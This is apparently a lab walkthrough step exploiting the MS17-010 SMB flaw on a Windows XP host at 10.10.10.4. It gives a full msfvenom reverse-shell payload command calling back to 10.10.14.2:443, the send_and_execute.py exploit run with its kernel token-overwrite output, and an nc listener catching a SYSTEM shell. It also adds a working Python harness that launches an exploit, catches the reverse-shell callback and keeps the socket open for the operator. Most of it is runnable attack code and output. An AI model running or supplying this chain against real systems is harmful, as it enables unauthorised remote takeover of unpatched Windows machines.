4 MS17-010
Using https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
The script speaks SMBv1 to port 445, abuses the MS17-010 transaction bug to get arbitrary kernel read/write, patches the token of its own SMB session so the session runs as SYSTEM, then uploads the given executable over SMB and starts it as a service through the Service Control Manager. It takes a target and an executable, so a reverse shell is built with msfvenom first, and the listener on the chosen LPORT must be up before the exploit is launched.
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.2_443.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev_10.10.14.2_443.exe
$ python send_and_execute.py 10.10.10.4 rev_10.10.14.2_443.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81e8c358
SESSION: 0xe17fbee8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe181a030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe181a0d0
overwriting token UserAndGroups
Sending file SPYS8Z.exe...
Opening SVCManager on 10.10.10.4.....
Creating service zNQc.....
Starting service zNQc.....
The NETBIOS connection with the remote host timed out.
Removing service zNQc.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
The NETBIOS timeout, ServiceExec Error and nca_s_proto_error lines are expected with this payload: a bare reverse shell never reports a running state back to the Service Control Manager, so the service start times out and the script removes the service, but the executable has already run and the callback arrives on the listener.
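The success criterion for this step is the callback, not the exploit's exit message. The harness below, an added example that is not part of the original page or of the send_and_execute.py project, starts the listener first, only then launches the exploit command, grabs the shell banner from the incoming connection, and treats a service-start error as a failure only when no callback arrived. It assumes the exploit is any command runnable with subprocess and that the payload connects back to LPORT on this host; simulate_callback_cmd and simulate_no_callback_cmd are constructed stand-ins for the real payload so the harness can be exercised offline.

```python
"""Catch a reverse-shell callback and judge an exploit run by that callback."""
import socket
import subprocess
import sys
import threading


def free_port():
    """Ask the OS for an unused TCP port (used by the offline self-test)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def _listen(lport, timeout, ready, result):
    """Accept one callback on lport, read its banner, hand the socket back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", lport))
    srv.listen(1)
    srv.settimeout(timeout)
    ready.set()                       # safe to fire the exploit now
    try:
        conn, peer = srv.accept()
    except socket.timeout:
        result["peer"] = None
        return
    finally:
        srv.close()
    conn.settimeout(2.0)
    try:
        banner = conn.recv(4096)      # cmd.exe sends its banner on connect
    except socket.timeout:
        banner = b""
    result["peer"] = peer
    result["banner"] = banner.decode("latin-1", "replace")
    result["conn"] = conn             # left open for the operator


def run_with_listener(exploit_cmd, lport, timeout=60.0):
    """Bind lport, run exploit_cmd, wait up to timeout for the callback."""
    result = {}
    ready = threading.Event()
    t = threading.Thread(target=_listen, args=(lport, timeout, ready, result))
    t.start()
    ready.wait()                      # never launch before the listener is bound
    proc = subprocess.run(exploit_cmd, capture_output=True, text=True)
    t.join()
    out = proc.stdout + proc.stderr
    result["service_error"] = ("ServiceExec Error" in out
                               or "nca_s_proto_error" in out)
    result["callback"] = result.get("peer") is not None
    if result["callback"]:
        # A bare reverse shell never answers the SCM, so a start timeout
        # next to a live callback is the normal outcome, not a failure.
        result["verdict"] = "shell"
    elif result["service_error"]:
        result["verdict"] = "service start failed and no callback"
    else:
        result["verdict"] = "no callback"
    return result


def simulate_callback_cmd(lport, banner="Microsoft Windows XP [Version 5.1.2600]\r\n"):
    """Constructed stand-in for the payload: connects back and sends a banner."""
    code = ("import socket; s = socket.create_connection(('127.0.0.1', %d)); "
            "s.sendall(%r); s.close()" % (lport, banner.encode()))
    return [sys.executable, "-c", code]


def simulate_no_callback_cmd():
    """Constructed stand-in for a run whose service start fails without a shell."""
    return [sys.executable, "-c",
            "print('ServiceExec Error on: 10.10.10.4\\nnca_s_proto_error')"]


if __name__ == "__main__":
    # Real use against the page's target (assumed paths):
    # run_with_listener(["python", "send_and_execute.py",
    #                    "10.10.10.4", "rev_10.10.14.2_443.exe"], 443)
    port = free_port()
    r = run_with_listener(simulate_callback_cmd(port), port, timeout=10)
    print(r["verdict"], r.get("banner", "").strip())
```

The returned socket in result["conn"] is the shell; hand it to an interactive loop (or keep using nc as on this page) once the verdict says "shell".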
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.4] 1030
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>